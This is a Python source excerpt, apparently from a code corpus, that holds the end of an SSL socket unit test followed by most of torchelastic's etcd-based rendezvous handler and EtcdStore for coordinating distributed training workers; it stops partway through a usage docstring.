self.assert_open(client_socket, fileno)
f = client_socket.makefile()
self.assert_open(client_socket, fileno)
self.assertEqual(f.read(), 'test_serverssl_makefile2')
self.assertEqual(f.read(), '')
f.close()
if WIN and psutil:
# Hmm?
self.extra_allowed_open_states = (psutil.CONN_CLOSE_WAIT,)
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_closed(client_socket, fileno)
finally:
t.join()
listener.close()
if __name__ == '__main__':
unittest.main()
|
etcd_rendezvous.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import datetime
import json
import logging
import random
import sys
import threading
import time
from base64 import b64decode, b64encode
from typing import Optional
import etcd
# pyre-ignore[21]: Could not find name `Store` in `torch.distributed`.
from torch.distributed import Store
from torchelastic.rendezvous import (
RendezvousClosedException,
RendezvousHandler,
RendezvousNonRetryableError,
RendezvousParameters,
RendezvousTimeoutException,
)
_log_fmt = logging.Formatter("%(levelname)s %(asctime)s %(message)s")
_log_handler = logging.StreamHandler(sys.stderr)
_log_handler.setFormatter(_log_fmt)
log = logging.getLogger(__name__)
log.propagate = False
log.setLevel(logging.INFO)
log.addHandler(_log_handler)
# Retryable failure exception means the we were too late to make
# a desired state transition (e.g. because of a race condition),
# and should now restart from the beginning.
# A small delay is recommended to avoid spamming Etcd.
class EtcdRendezvousRetryableFailure(Exception):
pass
# Similar to retryable failure, but the new state we observed suggests we
# can re-try immediately, i.e. without a need for "safety delay".
class EtcdRendezvousRetryImmediately(Exception):
pass
# Default overall timeout for rendezvous barrier.
CONST_DEFAULT_OVERALL_TIMEOUT = 600
# Additional waiting amount after reaching num_min_workers,
# for the case rendezvous is elastic (min != max):
CONST_DEFAULT_LAST_CALL_TIMEOUT = 30
# Various constants used internally in EtcdRendezvous
CONST_ETCD_SETUP_TTL = 5
CONST_ETCD_FROZEN_TTL = 10
CONST_ETCD_JOINABLE_EPHEMERAL_TTL = 10
# Ephemeral node TTL for worker's keep-alive key:
CONST_WORKER_KEEPALIVE_TTL = 10
# TTL for the ephemeral run_id-specific directory. All rendezvous state data
# for a specific run_id (job instance) is contained within directory.
# Its only role is to clean-up rendezvous data from old runs (for the case when
# etcd server is persistent), and has no affect on correctnes, but should be
# larger than any timeouts that a worker process is expected to survive:
CONST_RUNID_SUBROOT_TTL = 7200 # 2 hours
# Delay (sleep) for a small random amount to reduce CAS failures.
# This does not affect correctness, but will reduce requests to etcd server.
def cas_delay():
time.sleep(random.uniform(0, 0.1))
class EtcdRendezvousHandler(RendezvousHandler):
"""
Implements a :py:class:`torchelastic.rendezvous.RendezvousHandler`
interface backed by
:py:class:`torchelastic.rendezvous.etcd_rendezvous.EtcdRendezvous`.
Torchelastic uses a URL to configure the type of rendezvous to use and
to pass implementation specific configurations to the rendezvous module.
The basic etcd rendezvous configuration URL looks like the following
::
etcd://<etcd_address>:<port>/<job_id>?min_workers=<min_workers>&max_workers=<max_workers> # noqa W605
-- example --
etcd://localhost:2379/1234?min_workers=1&max_workers=3
The URL above is interpreted as follows:
1. Use the rendezvous handler that is registered with the ``etcd``
scheme
2. The ``etcd`` endpoint to use is ``localhost:2379``
3. ``job_id == 1234`` is used as the prefix in etcd (this allows one to
share a common etcd server for multiple jobs so long as the
``job_ids`` are guaranteed to be unique). Note that the job id can be
any string (e.g. does not need to be a number) as long as it is
unique.
4. ``min_workers=1`` and ``max_workers=3`` specifies a range for
membership size - torchelastic starts running the job as long as the
cluster size is greater than or equal to ``min_workers`` and admits
up to ``max_workers`` into the cluster.
Below are a full list of the parameters that can be passed to etcd
rendezvous:
+--------------------------------------------+--------------------------+
| Parameter | Description |
+============================================+==========================+
| min_workers | minimum number of |
| | workers for the |
| | rendezvous to be valid |
+--------------------------------------------+--------------------------+
| max_workers | maximum number of |
| | workers to admit |
+--------------------------------------------+--------------------------+
| timeout | total timeout within |
| | which next_rendezvous is |
| | expected to succeed |
| | (default 600s) |
+--------------------------------------------+--------------------------+
| last_call_timeout | additional wait amount |
| | (“last call”) after min |
| | number of workers has |
| | been reached (defaults |
| | to 30s) |
+--------------------------------------------+--------------------------+
| etcd_prefix | path prefix (from etcd |
| | root), inside which all |
| | etcd nodes will be |
| | created (defaults to |
| | ``/torchelastic/p2p``) |
+--------------------------------------------+--------------------------+
"""
def __init__(self, rdzv_impl):
self._rdzv_impl = rdzv_impl
def __del__(self):
# TODO: look into using weakref here instead.
del self._rdzv_impl
def next_rendezvous(self):
rdzv_version, rank, world_size = self._rdzv_impl.rendezvous_barrier()
log.info("Creating EtcdStore as the c10d::Store implementation")
store = self._rdzv_impl.setup_kv_store(rdzv_version)
return store, rank, world_size
def is_closed(self):
try:
_, state = self._rdzv_impl.get_rdzv_state()
return state["status"] == "closed"
except etcd.EtcdKeyNotFound:
# No rendezvous state, so it cannot be closed.
return False
def set_closed(self):
self._rdzv_impl.set_closed()
def num_nodes_waiting(self):
try:
_, state = self._rdzv_impl.get_rdzv_state()
if state["status"] == "final":
return state["num_workers_waiting"]
except etcd.EtcdKeyNotFound:
pass
return 0
def get_run_id(self) -> str:
return self._rdzv_impl._run_id
def shutdown(self) -> bool:
try:
self.set_closed()
return True
except BaseException as e:
log.warning(f"Shutdown failed. Error occurred: {str(e)}")
return False
# TODO: we should probably handle a few additional errors,
# like EtcdLeaderElectionInProgress and EtcdWatcherCleared. These are
# only relevant for multi-node Etcd ensemble. A simple retry would work,
# but is verbose to add everywhere. Consider wrapping the client calls
# into auto-retry for these errors?
#
class EtcdRendezvous(object):
"""
A rendezvous implementation that uses `etcd <https://etcd.io/>`__ as
the backend store.
"""
def __init__(
self,
endpoints,
prefix,
run_id,
num_min_workers,
num_max_workers,
timeout,
last_call_timeout,
**kwargs,
):
self._prefix = prefix
self._run_id = run_id
self._num_min_workers = num_min_workers
self._num_max_workers = num_max_workers
self._timeout = timeout
self._last_call_timeout = last_call_timeout
# For cleaning up TTL refresher threads (for ephemeral keys)
self._lease_run_id_stop = None
self._lease_this_rank_stop = None
if not self._prefix.endswith("/"):
self._prefix += "/"
self.client = etcd.Client(host=endpoints, allow_reconnect=True, **kwargs)
log.info("Etcd machines: " + str(self.client.machines))
# Setup a permanent prefix dir, if didn't exist
if self._prefix != "/":
self.create_path_if_not_exists(self._prefix)
# Lease a "sub-root" node specific to this job instance (run_id)
self.create_path_if_not_exists(self.get_path(""), ttl=CONST_RUNID_SUBROOT_TTL)
self._lease_run_id_stop = self.setup_lease_renewal(
self.get_path(""), ttl=CONST_RUNID_SUBROOT_TTL
)
# Subdir for all rendezvous work
self.create_path_if_not_exists(self.get_path("/rdzv"))
# Create a rendezvous version counter, if doesn't exist
try:
self.client.write(
key=self.get_path("/rdzv/version_counter"), value="0", prevExist=False
)
except etcd.EtcdAlreadyExist:
pass
def __del__(self):
# TODO: look into using weakref here instead.
if self._lease_run_id_stop is not None:
self._lease_run_id_stop.set()
if self._lease_this_rank_stop is not None:
self._lease_this_rank_stop.set()
def rendezvous_barrier(self):
"""
Main entry point for next rendezvous.
This method is blocking until rendezvous succeeds or a timeout occurs.
Returns:
``(rdzv_version, rank, world_size)``
Raises:
RendezvousTimeoutException - timeout waiting for rendezvous
RendezvousNonRetryableError - other persistent errors that
render the rendezvous non-retryable
RendezvousClosedException - rendezvous is or was closed while
waiting
"""
self._rendezvous_deadline = time.time() + self._timeout
while True:
if time.time() > self._rendezvous_deadline:
raise RendezvousTimeoutException()
log.info("Attempting to join next rendezvous")
try:
# Dis-own our lease in the previous rendezvous, if exists
if self._lease_this_rank_stop is not None:
self._lease_this_rank_stop.set()
return self.init_phase()
except EtcdRendezvousRetryImmediately:
# The type of failure suggests we can retry without delay
pass
except EtcdRendezvousRetryableFailure:
# In case of retryable failure, wait a small delay
# to avoid spamming etcd
time.sleep(1)
except RendezvousTimeoutException:
log.info("Rendezvous timeout occured in EtcdRendezvousHandler")
raise
except RendezvousClosedException:
log.info(
f"Rendezvous for run_id={self._run_id} was observed to be closed"
)
raise
except RendezvousNonRetryableError:
raise
except Exception as e:
# In case of a general exception, wait a small delay
# to avoid spamming etcd
# FIXME: there are a few things that fall under this like
# etcd.EtcdKeyNotFound, etc, which could be handled more explicitly.
log.info("Rendezvous attempt failed, will retry. Reason: " + str(e))
time.sleep(1)
def init_phase(self):
"""
Initially, the rendezvous state is expected to be one of:
1. empty (non-existent) - in this case we try to create a new one.
2. joinable - we try to join it.
3. final - we announce ourselves as waiting, and go into monitoring mode
Any other state is considered transitional, and will be retried after
a short delay.
Returns:
``(rdzv_version, rank, world_size)``
Raises:
RendezvousClosedException - current rendezvous was/is closed
EtcdRendezvousRetryableFailure - observed some intermediate
state, which is best handled by retrying later
"""
try:
active_version = self.try_create_rendezvous()
state = json.loads(active_version.value)
log.info("New rendezvous state created: " + str(state))
except etcd.EtcdAlreadyExist:
active_version, state = self.get_rdzv_state()
# Note: it is possible for above query to fail (etcd.EtcdKeyNotFound),
# but this is ok for us - just means we'll restart from beginning.
log.info("Observed existing rendezvous state: " + str(state))
if state["status"] == "closed":
raise RendezvousClosedException()
if state["status"] == "joinable":
return self.join_phase(state["version"])
if state["status"] == "final":
self.handle_existing_rendezvous(state["version"])
raise EtcdRendezvousRetryImmediately()
self.try_wait_for_state_change(etcd_index=active_version.etcd_index + 1)
raise EtcdRendezvousRetryableFailure()
def join_phase(self, expected_version):
"""
We observed a rendezvous state in 'joinable' state, and attempt to join this
particular version, and then wait for all other peers to join.
"""
# Failure to join will propagate an exception, causing a re-entry.
active_version, this_rank = self.join_rendezvous(expected_version)
state = json.loads(active_version.value)
log.info(
"Joined rendezvous version {} as rank {}. Full state: {}".format(
state["version"], this_rank, state
)
)
# If this worker was first to reach num_min_workers requirement,
# and rendezvous is still joinable (therefore it is elastic),
# then this worker will be repsonsible for waiting out the "last call"
# timeout and closing (i.e. transitioning to 'frozen') the rendezvous
# afterwards.
# As a safety against a potential failure of this worker (during the
# last call timeout), the rendezvous state is made ephemeral
# when min_num_workers is reached.
if this_rank == self._num_min_workers - 1 and state["status"] == "joinable":
log.info("Rank {} is responsible for join last call.".format(this_rank))
last_call_deadline = time.time() + self._last_call_timeout
self.handle_join_last_call(expected_version, last_call_deadline)
log.info("Rank {} finished join last call.".format(this_rank))
# Wait for rendezvous state to be frozen, which means a fixed set of peers
log.info("Waiting for remaining peers.")
active_version = self.wait_for_peers(expected_version)
state = json.loads(active_version.value)
assert (
state["version"] == expected_version
), "Logic error: failed to observe version mismatch"
return self.confirm_phase(expected_version, this_rank)
def confirm_phase(self, expected_version, this_rank):
"""
Once the rendezvous state trainsitions from 'joinable' to 'frozen',
we have every participant confirm their membership and setup per-member
keep-alive TTL keys, and then wait for all other participants to confirm,
which would then successfully conclude this rendezvous.
"""
log.info("All peers arrived. Confirming membership.")
self.confirm_membership(expected_version, this_rank)
log.info("Waiting for confirmations from all peers.")
active_version = self.wait_for_final(expected_version)
state = json.loads(active_version.value)
log.info(
"Rendezvous version {} is complete. Final state: {}".format(
state["version"], state
)
)
# Rendezvous version number; our rank in it; world size
return state["version"], this_rank, len(state["participants"])
def handle_existing_rendezvous(self, expected_version):
"""
Handle the case when there's an existing (state 'final) rendezvous already
in place, and we have to announce ourselves waiting, and wait until
the next rendezvous opportunity.
"""
# If state is 'final' -> increment num_workers_waiting
# Then, observe state changes:
# 1. if it's no longer final -> bail out and re-try
# 2. if keep alives are missing, destroy it and bail out.
active_state = self.announce_self_waiting(expected_version)
log.info(
"Added self to waiting list. Rendezvous full state: {}".format(
active_state.value
)
)
self.wait_for_rendezvous_to_free(expected_version)
log.info("Previously existing rendezvous state changed. Will re-try joining.")
def try_create_rendezvous(self):
"""
Create new rendezvous state or raise an exception that indicates
an unexpected state (e.g. already exists)
Raises:
RendezvousNonRetryableError - on unexpected state
"""
# Initially active_version is ephemeral - this is to handle the
# possibility that might fail to complete the setup transaction,
# i.e. the transition "setup" -> "joinable".
active_version = self.client.write(
key=self.get_path("/rdzv/active_version"),
value=json.dumps({"status": "setup"}),
prevExist=False,
ttl=CONST_ETCD_SETUP_TTL,
)
try:
version_counter = self.client.get(self.get_path("/rdzv/version_counter"))
version_counter.value = str(int(version_counter.value) + 1)
self.client.update(version_counter)
except (etcd.EtcdKeyNotFound, etcd.EtcdCompareFailed):
raise RendezvousNonRetryableError(
"Unexpected state of EtcdRendezvousHandler, worker needs to die."
)
# Any failure below results in declaring a retryable rendezvous failure.
# The ephemeral /rdzv/active_version will expire and someone can then
# re-try the setup process.
# Create directory node for participant data
self.client.write(
key=self.get_path("/rdzv/v_{}".format(version_counter.value)),
value=None,
dir=True,
prevExist=False,
)
# Publish rendezvous version and signal it is ready-to-be-joined.
# If rendezvous was set closed just before this, a retry will happen,
# where the closed condition will be handled.
return self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(
{
"status": "joinable",
"version": version_counter.value,
"participants": [],
}
),
prev_value=active_version.value,
)
def join_rendezvous(self, expected_version):
"""
Helper method for the join phase.
"""
# Use compare-and-swap to add self to rendezvous state:
while True:
cas_delay()
active_version, state = self.get_rdzv_state()
if state["status"] != "joinable":
raise EtcdRendezvousRetryableFailure(
"Rendezvous state became non-joinable before we could join. "
"Must join next one."
)
if state["version"] != expected_version:
raise EtcdRendezvousRetryImmediately(
"Rendezvous version changed. Must try join the new one."
)
assert (
len(state["participants"]) < self._num_max_workers
), "Logic error: joinable rendezvous should always have space left"
this_rank = len(state["participants"])
state["participants"].append(this_rank)
# When reaching min workers, or changing state to frozen, we'll set
# the active_version node to be ephemeral.
if len(state["participants"]) == self._num_max_workers:
state["status"] = "frozen"
state["keep_alives"] = []
set_ttl = CONST_ETCD_FROZEN_TTL
elif len(state["participants"]) >= self._num_min_workers:
set_ttl = CONST_ETCD_JOINABLE_EPHEMERAL_TTL
else:
set_ttl = None
try:
# Compare-and-swap.
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
ttl=set_ttl,
)
# We succeeded joining.
return active_version, this_rank
except etcd.EtcdCompareFailed:
log.info("Join rendezvous CAS unsuccessful, retrying")
def wait_for_peers(self, expected_version):
"""
Helper method for the join phase.
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] == "frozen" and state["version"] == expected_version:
# Success, all peers arrived.
return active_version
elif state["status"] == "joinable" and state["version"] == expected_version:
# Continue waiting for any interesting events.
active_version, state = self.try_wait_for_state_change(
etcd_index=active_version.etcd_index + 1
)
else:
# No valid transition possible at this point
raise EtcdRendezvousRetryableFailure(
"Rendezvous state transition no longer possible. Must re-enter."
)
def confirm_membership(self, expected_version, this_rank):
"""
Helper method for the confirm phase
"""
# Compare-and-swap loop
while True:
cas_delay()
active_version, state = self.get_rdzv_state()
if state["status"] != "frozen":
raise EtcdRendezvousRetryImmediately(
"Rendezvous no longer frozen, before we confirmed. "
"Must join next one"
)
if state["version"] != expected_version:
raise EtcdRendezvousRetryImmediately(
"Rendezvous version changed. Must try join the new one."
)
this_lease_key = self.get_path(
"/rdzv/v_{}/rank_{}".format(expected_version, this_rank)
)
self.client.set(this_lease_key, value=None, ttl=CONST_WORKER_KEEPALIVE_TTL)
state["keep_alives"].append(this_lease_key)
if len(state["keep_alives"]) == len(state["participants"]):
# Everyone confirmed (this rank is last to do so)
state["status"] = "final"
state["num_workers_waiting"] = 0
finalize = True
else:
finalize = False
try:
# Compare-and-swap. If new state is still frozen, keep it ephemeral.
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
ttl=None if finalize else CONST_ETCD_FROZEN_TTL,
)
self._lease_this_rank_stop = self.setup_lease_renewal(
this_lease_key, ttl=CONST_WORKER_KEEPALIVE_TTL
)
return active_version
except etcd.EtcdCompareFailed:
log.info("Confirm membership CAS unsuccessful, retrying")
def wait_for_final(self, expected_version):
"""
Helper method for the confirm phase
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] == "final" and state["version"] == expected_version:
# Succcess. This rendezvous is final, and we accept it.
return active_version
elif state["status"] == "frozen" and state["version"] == expected_version:
# Continue waiting for any interesting events.
active_version, state = self.try_wait_for_state_change(
etcd_index=active_version.etcd_index + 1
)
else:
# No valid transition possible at this point
raise EtcdRendezvousRetryableFailure(
"Rendezvous state transition no longer possible. Must re-enter."
)
def announce_self_waiting(self, expected_version):
"""
Announce this worker is waiting (via num_workers_waiting counter) to join next
rendezvous, but only if state and version match.
"""
while True:
cas_delay()
active_version, state = self.get_rdzv_state()
if state["status"] != "final" or state["version"] != expected_version:
raise EtcdRendezvousRetryImmediately()
# Increment counter to signal an additional waiting worker.
state["num_workers_waiting"] += 1
try:
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
)
return active_version
except etcd.EtcdCompareFailed:
log.info("Announce self as waiting CAS unsuccessful, retrying")
def wait_for_rendezvous_to_free(self, expected_version):
"""
When there's an existing valid rendezvous in state 'final', we have to
wait until the next opportunity to join.
Such opportunity may come from:
1. rendezvous state changed by someone else, in which case we unblock and retry.
2. rendezvous becomes invalid because at least one member failed to renew their
leased keep_alive node. We detect this, and destroy the rendezvous.
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] != "final" or state["version"] != expected_version:
return
# Check if current rendezvous state is valid, in the sense that all
# its members are alive (renewing their lease).
# If not, try destroy this rendezvous, so a new one can be created.
alive_members = self.client.get(
self.get_path("/rdzv/v_{version}".format(version=expected_version))
)
keep_alive_keys = [ch.key for ch in alive_members.children]
for key in state["keep_alives"]:
if key not in keep_alive_keys:
# This participant didn't renew their lease. We'll declare this
# rendezvous version as dead (but only if it hadn't changed)
log.info("Keep-alive key {} is not renewed.".format(key))
log.info(
"Rendevous version {} is incomplete. ".format(expected_version)
)
log.info("Attempting to destroy it.")
# Compare-and-delete operation. Throws if compare failed,
# which means rendezvous was already destroyed/re-created/closed,
# and we can try to re-enter the barrier.
self.client.delete(
key=self.get_path("/rdzv/active_version"),
prevValue=active_version.value,
)
log.info(
"Destroyed rendezvous version {} successfully.".format(
expected_version
)
)
# We can return (and retry) immediately
return
# Existing rendezvous seems valid, no reason to destroy it.
# We just have to wait until something changes and re-check.
try:
overall_timeout = (
max(self._rendezvous_deadline - time.time(), 0.0) + 1.0
)
self.client.watch(
key=self.get_path("/rdzv"),
index=active_version.etcd_index + 1,
recursive=True,
timeout=overall_timeout,
)
except (etcd.EtcdEventIndexCleared, etcd.EtcdWatchTimedOut):
pass
if time.time() > self._rendezvous_deadline:
raise RendezvousTimeoutException()
active_version, state = self.get_rdzv_state()
def handle_join_last_call(self, expected_version, deadline):
"""
After we reach min number of workers, one particular worker takes on the
responsibility of waiting an additional timeout before closing the join window.
If the worker responsible for this fails, the rendezvous will be destroyed due
to expiring TTL, and the other participants will re-rendezvous.
Here we expect to see state <joinable, expected_version>
Exit gracefully if either:
1. state becomes <frozen, expected_version>
2. timeout happens (reaching deadline), in which case
we try the tranisiton to <frozen, expected_version>
Exit with exception otherwise.
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] == "frozen" and state["version"] == expected_version:
# Worker set became frozen before last-call timeout. This is possible
# when num_max_workers is reached before the tiemout.
return
if state["status"] != "joinable" or state["version"] != expected_version:
raise EtcdRendezvousRetryableFailure(
"Rendezvous state transition no longer possible. Must re-enter."
)
# If timeout occurred, attempt a state transition (joinable -> frozen)
if time.time() >= deadline:
state["status"] = "frozen"
state["keep_alives"] = []
try:
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
ttl=CONST_ETCD_FROZEN_TTL,
)
# We successfully made this rendezvous frozen.
return
except etcd.EtcdCompareFailed:
log.info("Join last-call transition CAS unsuccessful. Will retry")
cas_delay()
active_version, state = self.get_rdzv_state()
continue
# Timeout did not occur, so we must refresh TTL, and wait for
# further changes. Note: we only want TTL to be refreshed if
# state is still joinable, hence we use CAS for that here,
# even though we don't change any of the data.
try:
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=active_version.value,
prev_value=active_version.value,
ttl=CONST_ETCD_JOINABLE_EPHEMERAL_TTL,
)
# Minimize "oversleeping":
timeout = min(
CONST_ETCD_JOINABLE_EPHEMERAL_TTL / 2,
deadline - time.time() + 1.0, # Oversleeping by 1s is ok.
)
active_version, state = self.try_wait_for_state_change(
etcd_index=active_version.etcd_index + 1, timeout=timeout
)
except etcd.EtcdCompareFailed:
log.info("Join last-call TTL refresh CAS unsuccessful, will retry")
cas_delay()
active_version, state = self.get_rdzv_state()
def set_closed(self):
"""
Mark rendezvous 'closed' for current run_id, which is used to signal other
participants to not attempt to perform (re-)rendezvous. This is useful
when one of the workers decides the job is complete.
"""
while True:
active_version, state = self.get_rdzv_state()
if state["status"] == "closed":
# Already closed by someone else.
return
state["status"] = "closed"
try:
self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
)
return
except etcd.EtcdCompareFailed:
log.info("Set closed CAS unsuccessful, retrying")
cas_delay()
def get_rdzv_state(self):
active_version = self.client.get(key=self.get_path("/rdzv/active_version"))
return active_version, json.loads(active_version.value)
def try_wait_for_state_change(self, etcd_index, timeout=None):
# Don't sleep past the overall deadline (at least more than by 1s)
overall_timeout = max(self._rendezvous_deadline - time.time(), 0.0) + 1.0
timeout = overall_timeout if timeout is None else min(timeout, overall_timeout)
try:
self.client.watch(
self.get_path("/rdzv/active_version"), index=etcd_index, timeout=timeout
)
except (etcd.EtcdEventIndexCleared, etcd.EtcdWatchTimedOut):
pass
if time.time() > self._rendezvous_deadline:
raise RendezvousTimeoutException()
# Unfortunately, we have to do another fetch in order to get last etcd_index.
return self.get_rdzv_state()
def get_path(self, path):
if not path.startswith("/"):
path = "/" + path
return "{prefix}run_{run_id}{path}".format(
prefix=self._prefix, run_id=self._run_id, path=path
)
def create_path_if_not_exists(self, full_path, ttl=None):
try:
self.client.write(
key=full_path, value=None, dir=True, prevExist=False, ttl=ttl
)
except etcd.EtcdAlreadyExist:
pass
def setup_lease_renewal(self, full_path, ttl):
# NOTE: For ephemeral key TTL renewal (~lease) to work correctly,
# make sure you don't call any long-blocking methods that do not
# release the Python's GIL! An example of this is calling a pybind11
# extension function that is blocking / long-running, but is not
# doing a scoped release of the GIL.
def lease_worker(client, path, ttl, stop_event):
while True:
try:
client.refresh(path, ttl=ttl)
except etcd.EtcdKeyNotFound:
break
if stop_event.wait(timeout=ttl / 2):
break
lease_stop_event = threading.Event()
lease_thread = threading.Thread(
target=lease_worker, args=(self.client, full_path, ttl, lease_stop_event)
)
lease_thread.daemon = True
lease_thread.start()
return lease_stop_event
def store_extra_data(self, rdzv_version, key, value):
node = self.get_path("/rdzv/v_{}/extra_data".format(rdzv_version))
try:
# If first time we are storing anything:
extra_data = self.client.write(
key=node, value=json.dumps({key: value}), prevExist=False
)
return
except etcd.EtcdAlreadyExist:
pass
# CAS loop, to make sure we don't lose concurrent stores.
while True:
# We never delete extra_data. Failure here should be fatal, no special handling.
extra_data = self.client.get(node)
new_extra_data_value = json.loads(extra_data.value)
new_extra_data_value[key] = value
try:
extra_data = self.client.test_and_set(
key=node,
value=json.dumps(new_extra_data_value),
prev_value=extra_data.value,
)
return
except etcd.EtcdCompareFailed:
log.info("Store extra_data CAS unsuccessful, retrying")
time.sleep(0.1)
def load_extra_data(self, rdzv_version, key, timeout=None):
# 'extra_data' node itself, and the directory it is located in:
node = self.get_path("/rdzv/v_{}/extra_data".format(rdzv_version))
node_dir = self.get_path("/rdzv/v_{}".format(rdzv_version))
# TODO: implement timeout
# https://github.com/pytorch/elastic/issues/12
while True:
# Combined wait for the node itself, and the key inside it.
root = self.client.get(node_dir)
# Find the extra_data node, if it exists
extra_data = [n for n in root.children if n.key == node]
assert len(extra_data) <= 1
# Node for extra_data exists, check the desired key inside it.
if len(extra_data) == 1:
extra_data_dict = json.loads(extra_data[0].value)
if key in extra_data_dict:
return extra_data_dict[key]
# The 'extra_data' node doesn't exist, or they key isn't published yet.
# Wait for interesting events on the extra_data node and retry.
try:
self.client.watch(node, index=root.etcd_index + 1)
except (etcd.EtcdEventIndexCleared, etcd.EtcdWatchTimedOut):
pass
def setup_kv_store(self, rdzv_version):
store_path = self.get_path(f"/rdzv/v_{rdzv_version}/kv")
self.create_path_if_not_exists(store_path)
return EtcdStore(etcd_client=self.client, etcd_store_prefix=store_path)
# pyre-fixme[11]: Annotation `Store` is not defined as a type.
class EtcdStore(Store):
"""
Implements a c10 Store interface by piggybacking on the rendezvous etcd
instance. This is the store object returned by ``EtcdRendezvous``
"""
def __init__(
self,
etcd_client,
etcd_store_prefix,
timeout: Optional[datetime.timedelta] = None,
):
super().__init__() # required for pybind trampoline.
self.client = etcd_client
self.prefix = etcd_store_prefix
# Default timeout same as in c10d/Store.hpp
self.timeout = (
timeout if timeout is not None else datetime.timedelta(seconds=300)
)
if not self.prefix.endswith("/"):
self.prefix += "/"
def set(self, key, value):
"""
Write a key/value pair into ``EtcdStore``.
Both key and value may be either Python ``str`` or ``bytes``.
"""
self.client.set(key=self.prefix + self._encode(key), value=self._encode(value))
def get(self, key) -> bytes:
"""
Get a value by key, possibly doing a blocking wait.
If key is not immediately present, will do a blocking wait
for at most ``timeout`` duration or until the key is published.
Returns:
value ``(bytes)``
Raises:
LookupError - If key still not published after timeout
"""
b64_key = self.prefix + self._encode(key)
kvs = self._try_wait_get([b64_key])
if kvs is None:
raise LookupError(f"Key {key} not found in EtcdStore")
return self._decode(kvs[b64_key])
def add(self, key, num: int) -> int:
"""
Atomically increment a value by an integer amount. The integer is
represented as a string using base 10. If key is not present,
a default value of ``0`` will be assumed.
Returns:
the new (incremented) value
"""
b64_key = self._encode(key)
# c10d Store assumes value is an integer represented as a decimal string
try:
# Assume default value "0", if this key didn't yet:
node = self.client.write(
key=self.prefix + b64_key,
value=self._encode(str(num)), # i.e. 0 + num
prevExist=False,
)
return int(self._decode(node.value))
except etcd.EtcdAlreadyExist:
pass
while True:
# Note: c10d Store does not have a method to delete keys, so we
# can be sure it's still there.
node = self.client.get(key=self.prefix + b64_key)
new_value = self._encode(str(int(self._decode(node.value)) + num))
try:
node = self.client.test_and_set(
key=node.key, value=new_value, prev_value=node.value
)
return int(self._decode(node.value))
except etcd.EtcdCompareFailed:
cas_delay()
def wait(self, keys, override_timeout: Optional[datetime.timedelta] = None):
"""
Waits until all of the keys are published, or until timeout.
Raises:
LookupError - if timeout occurs
"""
b64_keys = [self.prefix + self._encode(key) for key in keys]
kvs = self._try_wait_get(b64_keys, override_timeout)
if kvs is None:
raise LookupError("Timeout while waiting for keys in EtcdStore")
# No return value on success
def check(self, keys) -> bool:
"""
Check if all of the keys are immediately present (without waiting).
"""
b64_keys = [self.prefix + self._encode(key) for key in keys]
kvs = self._try_wait_get(
b64_keys,
override_timeout=datetime.timedelta(microseconds=1), # as if no wait
)
return kvs is not None
def set_timeout(self, timeout: datetime.timedelta):
"""
Change the timeout used for all future operations.
"""
self.timeout = timeout
#
# Encode key/value data in base64, so we can store arbitrary binary data
# in EtcdStore. Input can be `str` or `bytes`.
# In case of `str`, utf-8 encoding is assumed.
#
def _encode(self, value) -> str:
if type(value) == bytes:
return b64encode(value).decode()
elif type(value) == str:
return b64encode(value.encode()).decode()
raise ValueError("Value must be of type str or bytes")
#
# Decode a base64 string (of type `str` or `bytes`).
# Return type is `bytes`, which is more convenient with the Store interface.
#
def _decode(self, value) -> bytes:
if type(value) == bytes:
return b64decode(value)
elif type(value) == str:
return b64decode(value.encode())
raise ValueError("Value must be of type str or bytes")
#
# Get all of the (base64-encoded) etcd keys at once, or wait until all the keys
# are published or timeout occurs.
# This is a helper method for the public interface methods.
#
# On success, a dictionary of {etcd key -> etcd value} is returned.
# On timeout, None is returned.
#
def _try_wait_get(self, b64_keys, override_timeout=None):
timeout = self.timeout if override_timeout is None else override_timeout
deadline = time.time() + timeout.total_seconds()
while True:
# Read whole directory (of keys), filter only the ones waited for
all_nodes = self.client.get(key=self.prefix)
req_nodes = {
node.key: node.value
for node in all_nodes.children
if node.key in b64_keys
}
if len(req_nodes) == len(b64_keys):
# All keys are available
return req_nodes
watch_timeout = deadline - time.time()
if watch_timeout <= 0:
return None
try:
self.client.watch(
key=self.prefix,
recursive=True,
timeout=watch_timeout,
index=all_nodes.etcd_index + 1,
)
except etcd.EtcdWatchTimedOut:
if time.time() >= deadline:
return None
else:
continue
except etcd.EtcdEventIndexCleared:
continue
# Helper for _etcd_rendezvous_handler(url)
def _parse_etcd_client_params(params):
kwargs = {}
if "protocol" in params:
protocol = params["protocol"]
assert protocol in ["http", "https"], "Protocol must be http or https."
kwargs["protocol"] = protocol
if "cacert" in params:
kwargs["ca_cert"] = params["cacert"]
if "cert" in params:
if "key" in params:
# python-etcd client expects key as a second element of `cert` tuple
kwargs["cert"] = (params["cert"], params["key"])
else:
kwargs["cert"] = params["cert"]
return kwargs
# Handler for torch.distributed "static" registration
def create_rdzv_handler(rdzv_params: RendezvousParameters):
"""
Usage:
::
rdzv_params = RendezvousParameters(
backend="etcd",
endpoint="192.168.0.42:2379",
run_id="123",
min_nodes=4,
max_nodes=8,
timeout=300,
last_call_timeout=30,
etcd_prefix="custom_prefix",
protocol="https",
cacert="/etc/kubernetes/certs/ca.crt",
cert="/etc/kubernetes/certs/client.crt",
key="/etc/kubernetes/certs/client.key")
# -- or --
rdzv_params = RendezvousParameters(
backend="etcd",
endpoint="192.168.0.42:2379",
run_id="123",
min_nodes=4,
max_nodes=8)
etcd_rdzv_handler = create_etcd_rendezvous_handler(rdzv_params)
Where:
run_id - unique id for this training job instance,
